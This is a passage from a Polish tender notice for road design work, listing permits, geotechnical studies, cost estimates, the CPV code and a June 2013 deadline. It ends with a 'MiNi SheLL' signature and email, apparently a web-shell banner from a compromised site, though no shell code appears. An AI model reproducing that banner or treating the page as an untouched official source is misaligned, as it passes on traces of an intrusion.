6.	Przygotowanie wniosku i uzyskanie w imieniu Zamawiającego decyzji o środowiskowych uwarunkowaniach. W przypadku, gdy projektant uzna, że dla realizowanego przedsięwzięcia nie jest wymagane, zgodnie z obowiązującymi przepisami, uzyskanie decyzji o środowiskowych uwarunkowaniach, należy dołączyć do dokumentacji opinię organu właściwego do wydania przedmiotowej decyzji potwierdzającą brak konieczności jej uzyskania.
7.	Uzyskanie pozwolenia wodnoprawnego. Wykonanie operatu wodnoprawnego uzależnione jest od sposobu projektowania odwodnienia drogi. W przypadku, kiedy projektant uzna, że dla realizowanego przedsięwzięcia nie jest wymagane, zgodnie z obowiązującymi przepisami, uzyskanie pozwolenia wodnoprawnego, należy dołączyć do dokumentacji opinię organu właściwego do wydania decyzji-pozwolenie wodnoprawne, potwierdzającą brak konieczności jej uzyskania.
8.	Wykonanie niezbędnych badań geotechnicznych gruntu i opracowanie dokumentacji geotechnicznej.
9.	Wykonanie inwentaryzacji zadrzewienia kolidującego z rozwiązaniami projektowymi. Sporządzenie inwentaryzacji zadrzewienia kolidującego z rozwiązaniami projektowanymi oraz plan wyrębu.
10.	Wykonanie kosztorysów inwestorskich i przedmiarów na zaprojektowane roboty - układ szczegółowy i uproszczony. Kosztorysy należy wykonać dla każdej z ulic oddzielnie i oddzielnie dla każdej z branż w programie kosztorysowym NORMA lub innym kompatybilnym, przekazane winny być w formie papierowej a także na nośniku elektronicznym- wgranym w formacie *ath i *pdf
11.	Wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych oraz Informacji dotyczącej bezpieczeństwa i ochrony zdrowia.
12.	Uzyskanie pozostałych opinii, pozwoleń, postanowień i decyzji niezbędnych do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej wymaganych przez Ustawę z dnia 10 kwietnia 2003 r. ( z późniejszymi zmianami) o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
 13.  Złożenie wniosku w imieniu Zamawiającego i uzyskanie  decyzji o zezwoleniu na realizację inwestycji drogowej na podst. Ustawy z dnia 10 kwietnia 2003 r. ( z późniejszymi zmianami) o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com